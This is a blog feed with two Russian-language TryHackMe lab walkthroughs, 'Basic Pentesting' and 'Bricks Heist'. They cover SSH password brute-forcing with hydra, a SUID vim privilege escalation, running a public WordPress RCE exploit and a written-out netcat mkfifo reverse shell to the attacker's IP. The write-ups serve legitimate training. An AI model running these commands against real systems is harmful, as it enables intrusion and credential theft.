<?xml version="1.0" encoding="utf-8" ?><feed xmlns="http://www.w3.org/2005/Atom" xmlns:tt="http://teletype.in/" xmlns:opensearch="http://a9.com/-/spec/opensearch/1.1/"><title>miz0ru</title><author><name>miz0ru</name></author><id>https://teletype.in/atom/miz0ru</id><link rel="self" type="application/atom+xml" href="https://teletype.in/atom/miz0ru?offset=0"></link><link rel="alternate" type="text/html" href="https://teletype.in/@miz0ru?utm_source=teletype&amp;utm_medium=feed_atom&amp;utm_campaign=miz0ru"></link><link rel="next" type="application/rss+xml" href="https://teletype.in/atom/miz0ru?offset=10"></link><link rel="search" type="application/opensearchdescription+xml" title="Teletype" href="https://teletype.in/opensearch.xml"></link><updated>2026-04-05T17:15:19.779Z</updated><entry><id>miz0ru:-VzncSm-6Ou</id><link rel="alternate" type="text/html" href="https://teletype.in/@miz0ru/-VzncSm-6Ou?utm_source=teletype&amp;utm_medium=feed_atom&amp;utm_campaign=miz0ru"></link><title>TryHackMe: Basic Pentesting</title><published>2025-06-08T17:22:44.171Z</published><updated>2025-06-16T15:49:00.613Z</updated><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://img4.teletype.in/files/7b/88/7b88f68a-87d4-4fe3-ac53-8463e2321c84.png"></media:thumbnail><category term="pentest" label="Pentest"></category><summary type="html">&lt;img src=&quot;https://img1.teletype.in/files/8f/26/8f26370d-5353-4302-90ab-448220167a63.png&quot;&gt;https://tryhackme.com/room/basicpentestingjt</summary><content type="html">
  &lt;p id=&quot;1LOo&quot;&gt;&lt;a href=&quot;https://tryhackme.com/room/basicpentestingjt&quot; target=&quot;_blank&quot;&gt;https://tryhackme.com/room/basicpentestingjt&lt;/a&gt;&lt;/p&gt;
  &lt;p id=&quot;DvRy&quot;&gt;This is a machine that allows you to practice web app hacking and privilege escalation&lt;/p&gt;
  &lt;h3 id=&quot;dPZO&quot;&gt;МАТЕРИАЛ БЫЛ ПОДГОТОВЛЕН &lt;a href=&quot;https://t.me/miz0rubio&quot; target=&quot;_blank&quot;&gt;@MIZ0RU&lt;/a&gt; КАНАЛ &lt;a href=&quot;https://t.me/miz0rumain&quot; target=&quot;_blank&quot;&gt;@MIZ0RUMAIN&lt;/a&gt;&lt;/h3&gt;
  &lt;h3 id=&quot;XJ3U&quot;&gt;МАТЕРИАЛ БЫЛ ПОДГОТОВЛЕН &lt;a href=&quot;https://t.me/miz0rubio&quot; target=&quot;_blank&quot;&gt;@MIZ0RU&lt;/a&gt; КАНАЛ &lt;a href=&quot;https://t.me/miz0rumain&quot; target=&quot;_blank&quot;&gt;@MIZ0RUMAIN&lt;/a&gt;&lt;/h3&gt;
  &lt;h3 id=&quot;gty6&quot;&gt;МАТЕРИАЛ БЫЛ ПОДГОТОВЛЕН &lt;a href=&quot;https://t.me/miz0rubio&quot; target=&quot;_blank&quot;&gt;@MIZ0RU&lt;/a&gt; КАНАЛ &lt;a href=&quot;https://t.me/miz0rumain&quot; target=&quot;_blank&quot;&gt;@MIZ0RUMAIN&lt;/a&gt;&lt;/h3&gt;
  &lt;p id=&quot;ybie&quot;&gt;Всех приветствую на райтапе лёгкой машины на THM &amp;quot;Basic Pentesting&amp;quot;!&lt;/p&gt;
  &lt;p id=&quot;u7dC&quot;&gt;По классике подключаемся по OpenVPN, вписываем хост&lt;/p&gt;
  &lt;pre id=&quot;iV8n&quot;&gt;echo &amp;quot;10.XX.XX.XX basic.thm&amp;quot; | sudo tee -a /etc/hosts&lt;/pre&gt;
  &lt;p id=&quot;CQr5&quot;&gt;Запускаем nmap-скан&lt;/p&gt;
  &lt;pre id=&quot;JJIJ&quot;&gt;sudo nmap -A -vv 10.XX.XX.XX&lt;/pre&gt;
  &lt;figure id=&quot;yMzY&quot; class=&quot;m_original&quot;&gt;
    &lt;img src=&quot;https://img4.teletype.in/files/f9/97/f997d9a6-2054-416c-af9c-227c62df955f.png&quot; width=&quot;813&quot; /&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;JcoB&quot;&gt;Я сразу пошёл проверять OpenSSH 7.2p2 через searchsploit&lt;/p&gt;
  &lt;pre id=&quot;B7eo&quot;&gt;searchsploit OpenSSH 7.2p2&lt;/pre&gt;
  &lt;p id=&quot;VDg4&quot;&gt;Нашёлся Username Enumeration эксплоит, и можно было бы узнать юзернеймы, но я решил работать с Samb&amp;#x27;ой. Запустим gobuster по директориям&lt;/p&gt;
  &lt;pre id=&quot;HOAF&quot;&gt;gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u basic.thm&lt;/pre&gt;
  &lt;figure id=&quot;B0MX&quot; class=&quot;m_original&quot;&gt;
    &lt;img src=&quot;https://img1.teletype.in/files/43/41/4341cb8f-83db-4c24-9261-0113af513812.png&quot; width=&quot;751&quot; /&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;3kbh&quot;&gt;Найдём директорию development, что станет нашим ответом. Внутри будет два .txt-файла, но там нет ничего ценного.&lt;/p&gt;
  &lt;p id=&quot;jK9B&quot;&gt;Вспоминаем, что на сервере есть SMB, подключимся посредством&lt;/p&gt;
  &lt;pre id=&quot;YhCw&quot;&gt;smbclient -L //basic.thm -N&lt;/pre&gt;
  &lt;p id=&quot;Oap7&quot;&gt;-L - показать все доступные через SMB директории&lt;/p&gt;
  &lt;p id=&quot;Z0xr&quot;&gt;-N - без пароля&lt;/p&gt;
  &lt;figure id=&quot;pHXZ&quot; class=&quot;m_original&quot;&gt;
    &lt;img src=&quot;https://img4.teletype.in/files/7e/b3/7eb3cb15-2b01-43b6-9d3e-2318c7a63459.png&quot; width=&quot;592&quot; /&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;Y7Wc&quot;&gt;Найдём директорию Anonymous, подключимся к ней&lt;/p&gt;
  &lt;pre id=&quot;rkDc&quot;&gt;smbclient //basic.thm/Anonymous -N&lt;/pre&gt;
  &lt;figure id=&quot;u8Ro&quot; class=&quot;m_original&quot;&gt;
    &lt;img src=&quot;https://img2.teletype.in/files/50/91/50911662-b6f8-46a0-82da-a3d7f323ff27.png&quot; width=&quot;772&quot; /&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;e3lD&quot;&gt;Откроем список файлов и скачаем его с помощью get&lt;/p&gt;
  &lt;pre id=&quot;R1zN&quot;&gt;ls
get staff.txt&lt;/pre&gt;
  &lt;p id=&quot;eXVP&quot;&gt;После этого файл скачается в директорию, из которой вы подключились к SMB&lt;/p&gt;
  &lt;figure id=&quot;6BBp&quot; class=&quot;m_original&quot;&gt;
    &lt;img src=&quot;https://img3.teletype.in/files/2a/78/2a785027-8385-4099-b303-044d09068bcb.png&quot; width=&quot;715&quot; /&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;koT4&quot;&gt;Внутри есть 2 имени: Jan и Kay, имя Jan подойдёт нам для ответа на пятый вопрос.&lt;/p&gt;
  &lt;p id=&quot;rzrS&quot;&gt;Давайте сбуртим SSH используя имя Jan (самбу сбрутить не получится и Kay тоже). Воспользуемся для этого hydra и словарём rockyou.&lt;/p&gt;
  &lt;pre id=&quot;mGJv&quot;&gt;hydra -l jan -P /usr/share/wordlists/rockyou.txt ssh://basic.thm&lt;/pre&gt;
  &lt;figure id=&quot;rpgX&quot; class=&quot;m_original&quot;&gt;
    &lt;img src=&quot;https://img2.teletype.in/files/d0/e5/d0e5c7ad-0555-405d-8e95-04de1fbd54b2.png&quot; width=&quot;928&quot; /&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;Oxfv&quot;&gt;Находим пароль armando и подключаемся с этими данными по SSH, протокол, по которому мы подключаемся - седьмой ответ&lt;/p&gt;
  &lt;pre id=&quot;gxjf&quot;&gt;ssh jan@basic.thm&lt;/pre&gt;
  &lt;p id=&quot;lqXq&quot;&gt;Внутри пусто, спустимся в директорию /home/ и узнаем что там&lt;/p&gt;
  &lt;pre id=&quot;LuER&quot;&gt;jan@basic2:~$ ls
jan@basic2:~$ pwd
/home/jan
jan@basic2:~$ cd ..
jan@basic2:~/home$ ls
jan kay&lt;/pre&gt;
  &lt;p id=&quot;T8j9&quot;&gt;Попробуем узнать, что мы можем запускать используя sudo -l&lt;/p&gt;
  &lt;pre id=&quot;UWp6&quot;&gt;jan@basic2:~$ sudo -l
[sudo] password for jan:
Sorry, user jan may not run sudo on basic2.&lt;/pre&gt;
  &lt;p id=&quot;BD4b&quot;&gt;Столкнёмся с ошибкой. Попробуем войти в kay, опять столкнёмся с ошибкой&lt;/p&gt;
  &lt;pre id=&quot;xu8K&quot;&gt;jan@basic2:/home$ sudo kay
[sudo] password for jan:
jan is not in the sudoers file. This incident will be reported&lt;/pre&gt;
  &lt;p id=&quot;N21n&quot;&gt;В таком случае нам надо воспользоваться SUID. Это специальный бит, отвечающий за то, чтобы программу запускать от имени владельца.&lt;/p&gt;
  &lt;p id=&quot;kWMY&quot;&gt;Чтобы найти все такие файлы воспользуемся командой&lt;/p&gt;
  &lt;pre id=&quot;CHlg&quot;&gt;find / -perm -4000 -type f 2&amp;gt;/dev/null&lt;/pre&gt;
  &lt;p id=&quot;NsXE&quot;&gt;find - команда чтобы найти файлы&lt;/p&gt;
  &lt;p id=&quot;rNL7&quot;&gt;/ - чтобы начать поиск по всей системе&lt;/p&gt;
  &lt;p id=&quot;5Mdq&quot;&gt;-perm -4000 - ищет файлы с правами доступа 4000, то есть с SUID-битом&lt;/p&gt;
  &lt;p id=&quot;Pczx&quot;&gt;-type f - ищет только файлы (исключая каталоги, сокеты...)&lt;/p&gt;
  &lt;p id=&quot;hy6O&quot;&gt;2&amp;gt;/dev/null - отключает вывод ошибок доступа, переправляя их в /dev/null&lt;/p&gt;
  &lt;figure id=&quot;NTVA&quot; class=&quot;m_original&quot;&gt;
    &lt;img src=&quot;https://img4.teletype.in/files/f8/d6/f8d68660-f706-4211-80ee-440fbb12e8d8.png&quot; width=&quot;453&quot; /&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;Tvia&quot;&gt;Из данного списка сразу в глаза бросается, vim, будем иметь это ввиду&lt;/p&gt;
  &lt;pre id=&quot;6wij&quot;&gt;/usr/bin/vim.basic&lt;/pre&gt;
  &lt;figure id=&quot;Wdbz&quot; class=&quot;m_original&quot;&gt;
    &lt;img src=&quot;https://img3.teletype.in/files/69/8a/698afb71-a868-4bdb-9479-bb63c2650d87.png&quot; width=&quot;544&quot; /&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;wIZ5&quot;&gt;Откроем директорию /home/kay и попробуем прочитать с помощью cat pass.bak, но нам скажет, что у нас недостаточно прав. Узнаем полную информацию о файле и правах с помощью&lt;/p&gt;
  &lt;pre id=&quot;WXYX&quot;&gt;ls -la&lt;/pre&gt;
  &lt;p id=&quot;zGpW&quot;&gt;Увидим, что у файла pass.bak есть атрибут r, то есть открывается от имени рута. И вспоминаем, что vim, как раз умеет так делать, пишем&lt;/p&gt;
  &lt;pre id=&quot;fHDz&quot;&gt;vim pass.bak&lt;/pre&gt;
  &lt;figure id=&quot;IdCn&quot; class=&quot;m_original&quot;&gt;
    &lt;img src=&quot;https://img2.teletype.in/files/d9/de/d9dee376-52d7-4d34-bbed-883e40644363.png&quot; width=&quot;670&quot; /&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;Fl9n&quot;&gt;И вот наш последний ответ! Чтобы выйти из vim&amp;#x27;а, просто напишите&lt;/p&gt;
  &lt;pre id=&quot;IXAx&quot;&gt;:q&lt;/pre&gt;
  &lt;p id=&quot;dzJV&quot;&gt;И нажмите Enter, поздравляю с ещё одной решённой задачей!&lt;/p&gt;
  &lt;h3 id=&quot;wd7I&quot;&gt;МАТЕРИАЛ БЫЛ ПОДГОТОВЛЕН &lt;a href=&quot;https://t.me/miz0rubio&quot; target=&quot;_blank&quot;&gt;@MIZ0RU&lt;/a&gt; КАНАЛ &lt;a href=&quot;https://t.me/miz0rumain&quot; target=&quot;_blank&quot;&gt;@MIZ0RUMAIN&lt;/a&gt;&lt;/h3&gt;
  &lt;h3 id=&quot;xVqz&quot;&gt;МАТЕРИАЛ БЫЛ ПОДГОТОВЛЕН &lt;a href=&quot;https://t.me/miz0rubio&quot; target=&quot;_blank&quot;&gt;@MIZ0RU&lt;/a&gt; КАНАЛ &lt;a href=&quot;https://t.me/miz0rumain&quot; target=&quot;_blank&quot;&gt;@MIZ0RUMAIN&lt;/a&gt;&lt;/h3&gt;
  &lt;h3 id=&quot;xMd0&quot;&gt;МАТЕРИАЛ БЫЛ ПОДГОТОВЛЕН &lt;a href=&quot;https://t.me/miz0rubio&quot; target=&quot;_blank&quot;&gt;@MIZ0RU&lt;/a&gt; КАНАЛ &lt;a href=&quot;https://t.me/miz0rumain&quot; target=&quot;_blank&quot;&gt;@MIZ0RUMAIN&lt;/a&gt;&lt;/h3&gt;

</content></entry><entry><id>miz0ru:T8jLrgEg_TL</id><link rel="alternate" type="text/html" href="https://teletype.in/@miz0ru/T8jLrgEg_TL?utm_source=teletype&amp;utm_medium=feed_atom&amp;utm_campaign=miz0ru"></link><title>TryHACK3M: Bricks Heist</title><published>2025-06-05T15:09:57.223Z</published><updated>2025-06-16T15:49:23.850Z</updated><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://img4.teletype.in/files/76/ab/76ab494b-59b8-472f-ae5f-5f97ce6381de.png"></media:thumbnail><summary type="html">&lt;img src=&quot;https://img3.teletype.in/files/69/63/6963b37a-367c-42e9-9306-047ff6e98890.png&quot;&gt;https://tryhackme.com/room/tryhack3mbricksheist</summary><content type="html">
  &lt;p id=&quot;4qSs&quot;&gt;&lt;a href=&quot;https://tryhackme.com/room/tryhack3mbricksheist&quot; target=&quot;_blank&quot;&gt;https://tryhackme.com/room/tryhack3mbricksheist&lt;/a&gt;&lt;/p&gt;
  &lt;p id=&quot;Vk1t&quot;&gt;Crack the code, command the exploit! Dive into the heart of the system with just an RCE CVE as your key.&lt;/p&gt;
  &lt;p id=&quot;6zQP&quot;&gt;&lt;/p&gt;
  &lt;h3 id=&quot;gyS5&quot;&gt;МАТЕРИАЛ БЫЛ ПОДГОТОВЛЕН @MIZ0RU ДЛЯ ФОРУМА @FORUMZERODAY ПРОСЬБА ПОДПИСАТЬСЯ&lt;/h3&gt;
  &lt;h3 id=&quot;7DWn&quot;&gt;МАТЕРИАЛ БЫЛ ПОДГОТОВЛЕН @MIZ0RU ДЛЯ ФОРУМА @FORUMZERODAY ПРОСЬБА ПОДПИСАТЬСЯ&lt;/h3&gt;
  &lt;h3 id=&quot;SL2h&quot;&gt;МАТЕРИАЛ БЫЛ ПОДГОТОВЛЕН @MIZ0RU ДЛЯ ФОРУМА @FORUMZERODAY ПРОСЬБА ПОДПИСАТЬСЯ&lt;/h3&gt;
  &lt;p id=&quot;pAWk&quot;&gt;&lt;/p&gt;
  &lt;p id=&quot;L0FO&quot;&gt;Всех приветствую, это райт-ап (write-up) лёгкой машины на THM &amp;quot;Bricks Heist&amp;quot;.&lt;/p&gt;
  &lt;p id=&quot;wUfg&quot;&gt;Подключимся по OpenVPN&lt;br /&gt;Добавим айпишник и хост в /etc/hosts&lt;/p&gt;
  &lt;pre id=&quot;Bsh6&quot;&gt;echo &amp;quot;10.XX.XX.XX bricks.thm&amp;quot; | sudo tee -a /etc/hosts&lt;/pre&gt;
  &lt;p id=&quot;U0WC&quot;&gt;Запустим nmap-скан&lt;/p&gt;
  &lt;pre id=&quot;3Nod&quot;&gt;sudo nmap -sS -sC -sV -T4 -vv 10.XX.XX.XX&amp;#x60;&amp;#x60;&amp;#x60;&lt;/pre&gt;
  &lt;figure id=&quot;FU6y&quot; class=&quot;m_original&quot;&gt;
    &lt;img src=&quot;https://img3.teletype.in/files/af/6d/af6d9c89-d870-4cdb-a7eb-343cc32a484f.png&quot; width=&quot;861&quot; /&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;THIA&quot;&gt;Внизу также есть MySQL, но он не понадобился. Стоит пока обратить внимание на директорию &lt;strong&gt;/wp-admin/&lt;/strong&gt;. Попробуем открыть сам сайт по http протоколу, но столкнёмся с ошибкой&lt;/p&gt;
  &lt;figure id=&quot;u0WV&quot; class=&quot;m_original&quot;&gt;
    &lt;img src=&quot;https://img4.teletype.in/files/f2/f4/f2f4355a-f7c0-4e72-9c58-40e2235922ba.png&quot; width=&quot;704&quot; /&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;0sTk&quot;&gt;Попробуем перейти по httpS, SSL недействительный. Но сайт хотя бы грузится, но внутри будет только стена. Воспользуемся gobuster, чтобы прошелестить директории, воспользуемся списком &lt;a href=&quot;https://github.com/danielmiessler/SecLists/blob/master/Discovery/Web-Content/directory-list-2.3-medium.txt&quot; target=&quot;_blank&quot;&gt;directory-list-2.3-medium.txt&lt;/a&gt;.&lt;br /&gt;&lt;/p&gt;
  &lt;pre id=&quot;81B0&quot;&gt;gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u https://bricks.thm&lt;/pre&gt;
  &lt;p id=&quot;Rezo&quot;&gt;Но выйдет ошибка, говорящая о недействительном SSL. Найдём соответствующий аргумент с помощью --help и grep&lt;/p&gt;
  &lt;pre id=&quot;rkzQ&quot;&gt;gobuster dir --help | grep &amp;quot;tls&amp;quot;&lt;/pre&gt;
  &lt;figure id=&quot;QqTd&quot; class=&quot;m_original&quot;&gt;
    &lt;img src=&quot;https://img2.teletype.in/files/51/e6/51e6267a-9b26-4cae-b61f-d3cfd752f10c.png&quot; width=&quot;618&quot; /&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;eQHZ&quot;&gt;Найдём аргумент -k, который нам поможет запустить скан директорий.&lt;/p&gt;
  &lt;figure id=&quot;5v1m&quot; class=&quot;m_original&quot;&gt;
    &lt;img src=&quot;https://img3.teletype.in/files/66/f1/66f124dc-4bbf-4d7f-97d7-5484e6ba550b.png&quot; width=&quot;861&quot; /&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;bOpc&quot;&gt;Натыкаемся снова на директории от WordPress (wp-content, admin). Становится ясно, куда копать дальше - расчехляем wpscan. Опять сталкиваемся с проблемами с ssl, повторяем действия&lt;/p&gt;
  &lt;pre id=&quot;U7yO&quot;&gt;wpscan --help | grep tls&lt;/pre&gt;
  &lt;figure id=&quot;OhkR&quot; class=&quot;m_original&quot;&gt;
    &lt;img src=&quot;https://img3.teletype.in/files/25/bd/25bd7bae-d6af-4dff-9cac-5a63c4b65ecf.png&quot; width=&quot;937&quot; /&gt;
  &lt;/figure&gt;
  &lt;figure id=&quot;tFuy&quot; class=&quot;m_original&quot;&gt;
    &lt;img src=&quot;https://img4.teletype.in/files/30/b8/30b8cfab-e4ab-4109-91b4-46425c80ccbe.png&quot; width=&quot;766&quot; /&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;nauD&quot;&gt;Запустили скан и видим тему &amp;quot;bricks&amp;quot;. Вспоминаем название задания, что является подсказкой и идём копать глубже.&lt;/p&gt;
  &lt;p id=&quot;VSRS&quot;&gt;Нехитрым запросом в гугле находим саму CVE и PoC к ней.&lt;/p&gt;
  &lt;figure id=&quot;jhdp&quot; class=&quot;m_original&quot;&gt;
    &lt;img src=&quot;https://img2.teletype.in/files/99/eb/99eb3690-573f-41b6-9297-dea0b3842a95.png&quot; width=&quot;736&quot; /&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;MG2c&quot;&gt;&lt;a href=&quot;https://github.com/K3ysTr0K3R/CVE-2024-25600-EXPLOIT&quot; target=&quot;_blank&quot;&gt;https://github.com/K3ysTr0K3R/CVE-2024-25600-EXPLOIT&lt;/a&gt; - воспользуемся этим скриптом.&lt;/p&gt;
  &lt;pre id=&quot;yRpD&quot;&gt;Клонируем репозиторий, входим в директорию и запускаем
git clone https://github.com/K3ysTr0K3R/CVE-2024-25600-EXPLOIT
cd CVE-2024-25600-EXPLOIT
python CVE-2024-25600.py&lt;/pre&gt;
  &lt;p id=&quot;5i4O&quot;&gt;Но мы столкнёмся с проблемой: ModuleNotFoundError: No module named &amp;#x27;alive_progress&amp;#x27;. Как я её решил (конечно, не очень правильно)&lt;/p&gt;
  &lt;pre id=&quot;QSHp&quot;&gt;nano CVE-2024-25600.py&lt;/pre&gt;
  &lt;figure id=&quot;NoLR&quot; class=&quot;m_original&quot;&gt;
    &lt;img src=&quot;https://img4.teletype.in/files/7c/bf/7cbfd981-690b-4cba-8a66-ff8b415fed7c.png&quot; width=&quot;928&quot; /&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;my6Z&quot;&gt;Я просто закомментировал 13 строку, которая мешает работе скрипта. Сохранил (Ctrl + O, Enter, Ctrl + X)&lt;/p&gt;
  &lt;figure id=&quot;nJ2M&quot; class=&quot;m_original&quot;&gt;
    &lt;img src=&quot;https://img4.teletype.in/files/76/f8/76f8fc2b-e794-4286-a0de-e4ebe63659a5.png&quot; width=&quot;812&quot; /&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;CjjU&quot;&gt;И скрипт заработал! Чтобы совершить атаку пишем:&lt;/p&gt;
  &lt;pre id=&quot;pCXd&quot;&gt;python CVE-2024-25600.py -u https://bricks.thm&lt;/pre&gt;
  &lt;p id=&quot;NjCo&quot;&gt;Пара секунд и мы в шелле! Чтобы сделать всё надёжнее сделаем уже reverse shell. Воспользуемся генератором &lt;a href=&quot;https://www.revshells.com/&quot; target=&quot;_blank&quot;&gt;revshells.com&lt;/a&gt;. Настроим его под себя:&lt;/p&gt;
  &lt;figure id=&quot;GKmz&quot; class=&quot;m_original&quot;&gt;
    &lt;img src=&quot;https://img1.teletype.in/files/4d/d7/4dd79ddd-b3da-425c-8e5e-55bb5686604a.png&quot; width=&quot;927&quot; /&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;MGRl&quot;&gt;В разделе IP &amp;amp; PORT ставим айпишник, который нам выдаст команда&lt;/p&gt;
  &lt;pre id=&quot;XByE&quot;&gt;ifconfig&lt;/pre&gt;
  &lt;figure id=&quot;tZ9a&quot; class=&quot;m_original&quot;&gt;
    &lt;img src=&quot;https://img4.teletype.in/files/bc/f2/bcf2c308-d8f4-4d9a-9e0d-9681a4cc2633.png&quot; width=&quot;733&quot; /&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;nJVm&quot;&gt;Нас интересует интерфейс tun0, читаем параметр inet и записываем значение айпи в генератор. Так же его можно увидеть в правом верхнем углу. &lt;/p&gt;
  &lt;p id=&quot;T6Dj&quot;&gt;Чтобы слушать порт мы вводим в кали команду (откройте новый терминал):&lt;/p&gt;
  &lt;pre id=&quot;EuZv&quot;&gt;nc -nvlp PORT&lt;/pre&gt;
  &lt;figure id=&quot;2J7A&quot; class=&quot;m_original&quot;&gt;
    &lt;img src=&quot;https://img2.teletype.in/files/1f/a5/1fa5945d-d233-4e53-9e90-4fa348016432.png&quot; width=&quot;789&quot; /&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;MZhQ&quot;&gt;Выбираете порт, которым будете пользоваться для прослушивания, в моём случае 1337.&lt;/p&gt;
  &lt;p id=&quot;L6x5&quot;&gt;И как видно на скрине, я воспользовался payload&amp;#x27;ом &amp;#x27;nc mkinfo&amp;#x27;, он работает безотказно. Пишем сгенерированную команду в строку Shell &amp;gt;&lt;/p&gt;
  &lt;pre id=&quot;HyF2&quot;&gt;rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2&amp;gt;&amp;amp;1|nc 10.21.199.107 1337 &amp;gt;/tmp/f&lt;/pre&gt;
  &lt;p id=&quot;kUMG&quot;&gt;И вуаля, на другом терминале у вас открылась копия командной строки (это нужно для того, что эксплойт может прерваться, что вам помешает).&lt;/p&gt;
  &lt;p id=&quot;jGnI&quot;&gt;Когда мы уже в системе напишем ls и увидим список файлов, первый будет подозрительный .txt&amp;#x27;шник. Прочитаем его с помощью команды cat и получим наш первый флаг!&lt;/p&gt;
  &lt;pre id=&quot;gQZf&quot;&gt;cat 650c844110baced87e1606453b93f22a.txt&lt;/pre&gt;
  &lt;p id=&quot;gcBk&quot;&gt;Чтобы получить второй воспользуемся командой&lt;/p&gt;
  &lt;pre id=&quot;aloL&quot;&gt;systemctl | grep running&lt;/pre&gt;
  &lt;p id=&quot;oQA5&quot;&gt;Обнаружим, что есть какой-то странный процесс ubuntu.service, его выдаёт подпись TRYHACK3M. Изучим его глубже:&lt;/p&gt;
  &lt;pre id=&quot;nNgI&quot;&gt;systemctl status ubuntu.service&lt;/pre&gt;
  &lt;figure id=&quot;Jhcu&quot; class=&quot;m_original&quot;&gt;
    &lt;img src=&quot;https://img3.teletype.in/files/61/ed/61edd94f-42da-44b1-8d01-378b37487486.png&quot; width=&quot;721&quot; /&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;39TV&quot;&gt;Увидим какой-то nm-inet-dialog, этот процесс и есть подозрительный, так что это будет наш второй флаг.&lt;/p&gt;
  &lt;p id=&quot;rgRY&quot;&gt;Третий флаг уже ясен, это ubuntu.service.&lt;/p&gt;
  &lt;p id=&quot;Y47w&quot;&gt;Перейдём в директорию /lib/NetworkManager/nm-inet-dialog и узнаем содержимое с помощью ls&lt;/p&gt;
  &lt;pre id=&quot;sY4R&quot;&gt;cd /lib/NetworkManager/nm-inet-dialog
ls&lt;/pre&gt;
  &lt;p id=&quot;tbwI&quot;&gt;Там будет inet.conf, прочитаем его содержание и увидим, что это и есть логи майнера, которые нам надо было найти.&lt;/p&gt;
  &lt;pre id=&quot;XTgo&quot;&gt;cat inet.conf&lt;/pre&gt;
  &lt;figure id=&quot;kCRp&quot; class=&quot;m_original&quot;&gt;
    &lt;img src=&quot;https://img2.teletype.in/files/52/9d/529d1ab2-a285-47bc-8cd5-fbe98269ab88.png&quot; width=&quot;938&quot; /&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;OtkW&quot;&gt;Так же мы можем прочитать ID: ..., закинем его в &lt;a href=&quot;https://gchq.github.io/CyberChef/&quot; target=&quot;_blank&quot;&gt;CyberChef&lt;/a&gt; и попробуем расшифровать. &lt;/p&gt;
  &lt;figure id=&quot;TxVE&quot; class=&quot;m_original&quot;&gt;
    &lt;img src=&quot;https://img1.teletype.in/files/c0/ad/c0adbd4b-f48a-41b7-990d-2c53d79ba577.png&quot; width=&quot;761&quot; /&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;mdGy&quot;&gt;Казалось бы, вот наш ключ, но он неправильный. Из-за формата текст дублируется дважды, так что мы его отсекаем до момента, когда он повторится.&lt;/p&gt;
  &lt;p id=&quot;fIja&quot;&gt;Это наш 4-ый флаг: bc1qyk79fcp9hd5kreprce89tkh4wrtl8avt4l67qa&lt;/p&gt;
  &lt;p id=&quot;gYzA&quot;&gt;А теперь применим навыки OSINT, поищем владельца кошелька. Нас ведёт на blockchain.com: &lt;a href=&quot;https://www.blockchain.com/explorer/addresses/btc/bc1qyk79fcp9hd5kreprce89tkh4wrtl8avt4l67qa&quot; target=&quot;_blank&quot;&gt;https://www.blockchain.com/explorer/addresses/btc/bc1qyk79fcp9hd5kreprce89tkh4wrtl8avt4l67qa&lt;/a&gt;&lt;/p&gt;
  &lt;figure id=&quot;sYcz&quot; class=&quot;m_original&quot;&gt;
    &lt;img src=&quot;https://img2.teletype.in/files/17/ee/17ee9ad0-8874-45aa-a70b-57a446ba3db2.png&quot; width=&quot;875&quot; /&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;J4Ig&quot;&gt;Откроем транзакцию на 3.85799... BTC. Поищем в интернете этот адрес и наткнёмся на сводку от государства: &lt;a href=&quot;https://ofac.treasury.gov/recent-actions/20240220&quot; target=&quot;_blank&quot;&gt;https://ofac.treasury.gov/recent-actions/20240220&lt;/a&gt;. В ней уже можно прочитать о какой группировке идёт речь, это LockBit, что является нашим 5-ым флагом!&lt;/p&gt;
  &lt;h3 id=&quot;2OUJ&quot;&gt;МАТЕРИАЛ БЫЛ ПОДГОТОВЛЕН @MIZ0RU ДЛЯ ФОРУМА @FORUMZERODAY ПРОСЬБА ПОДПИСАТЬСЯ&lt;/h3&gt;

</content></entry></feed>